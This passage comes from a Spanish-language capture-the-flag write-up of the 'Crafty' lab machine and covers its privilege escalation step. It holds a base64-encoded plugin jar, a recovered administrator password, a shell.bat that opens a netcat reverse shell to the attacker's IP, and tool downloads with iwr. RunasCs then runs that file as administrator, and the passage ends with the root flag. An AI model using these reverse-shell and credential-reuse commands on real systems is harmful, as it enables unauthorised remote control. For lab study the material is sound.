cmUvZXgvUEsBAhQAFAAICAgA5EZZUg+UL/D/AAAAmQEAADUAAAAAAAAAAAAAAAAAIRkAAG5ldC9rcm9ub3Mvcmtvbi9jb3JlL2V4L0F1dGhlbnRpY2F0aW9uRXhjZXB0aW9uLmNsYXNzUEsBAhQAFAAICAgA5EZZUjoNPB4IAQAAnAEAADYAAAAAAAAAAAAAAAAAgxoAAG5ldC9rcm9ub3Mvcmtvbi9jb3JlL2V4L01hbGZvcm1lZFBhY2tldEV4Y2VwdGlvbi5jbGFzc1BLAQIUABQACAgIAOFGWVIAAAAAAgAAAAAAAAAkAAAAAAAAAAAAAAAAAO8bAABNRVRBLUlORi9tYXZlbi9uZXQua3Jvbm9zLnJrb24uY29yZS9QSwECFAAUAAgICADhRllSAAAAAAIAAAAAAAAALgAAAAAAAAAAAAAAAABDHAAATUVUQS1JTkYvbWF2ZW4vbmV0Lmtyb25vcy5ya29uLmNvcmUvcmtvbi1jb3JlL1BLAQIUABQACAgIAOFGWVL6BBiCrwEAAPcFAAA1AAAAAAAAAAAAAAAAAKEcAABNRVRBLUlORi9tYXZlbi9uZXQua3Jvbm9zLnJrb24uY29yZS9ya29uLWNvcmUvcG9tLnhtbFBLAQIUABQACAgIAOVGWVKXqr33aAAAAHAAAAA8AAAAAAAAAAAAAAAAALMeAABNRVRBLUlORi9tYXZlbi9uZXQua3Jvbm9zLnJrb24uY29yZS9ya29uLWNvcmUvcG9tLnByb3BlcnRpZXNQSwUGAAAAABkAGQBxBwAAhR8AAAAA

echo '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' | base64 -d > playercounter-1.0-SNAPSHOT.jar

jd-gui

Password: s67u84zKq8IXw

Crear un archivo shell.bat

@echo on
C:\temp\nc64.exe 10.10.14.207 2222 -e cmd.exe

RunasCs

nc.exe

python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

PS C:\Users\svc_minecraft\server\plugins> mkdir C:\temp
mkdir C:\temp


    Directory: C:\


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----        10/7/2025  10:26 AM                temp 

PS C:\Users\svc_minecraft\server\plugins> iwr http://10.10.14.207:8000/RunasCs.exe -O c:\temp\RunasCs.exe
iwr http://10.10.14.207:8000/RunasCs.exe -O c:\temp\RunasCs.exe
PS C:\Users\svc_minecraft\server\plugins> iwr http://10.10.14.207:8000/nc64.exe -O c:\temp\nc64.exe
iwr http://10.10.14.207:8000/nc64.exe -O c:\temp\nc64.exe
PS C:\Users\svc_minecraft\server\plugins> iwr http://10.10.14.207:8000/shell.bat -O c:\temp\shell.bat
iwr http://10.10.14.207:8000/shell.bat -O c:\temp\shell.bat

nc -lnvp 2222
listening on [any] 2222 ...

PS C:\Users\svc_minecraft\server\plugins> cd C:\temp                                                        
cd C:\temp
PS C:\temp> .\RunasCs.exe -l 2 administrator s67u84zKq8IXw "c:\temp\shell.bat"
.\RunasCs.exe -l 2 administrator s67u84zKq8IXw "c:\temp\shell.bat"

nc -lnvp 2222
listening on [any] 2222 ...
connect to [10.10.14.207] from (UNKNOWN) [10.129.85.30] 49685
Microsoft Windows [Version 10.0.17763.5329]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
crafty\administrator

C:\Windows\system32>cd C:\Users\Administrator\Desktop
cd C:\Users\Administrator\Desktop

C:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is C419-63F6

 Directory of C:\Users\Administrator\Desktop

02/05/2024  07:05 AM    <DIR>          .
02/05/2024  07:05 AM    <DIR>          ..
10/07/2025  09:48 AM                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)   3,674,886,144 bytes free

C:\Users\Administrator\Desktop>type root.txt
type root.txt

Root flag

d18a************************3b3a

PreviousCap NextData

Last updated 4 months ago

hashtagEnumeración de puertos y servicios

hashtagUser flag

hashtagRoot flag

Enumeración de puertos y servicios

User flag

Root flag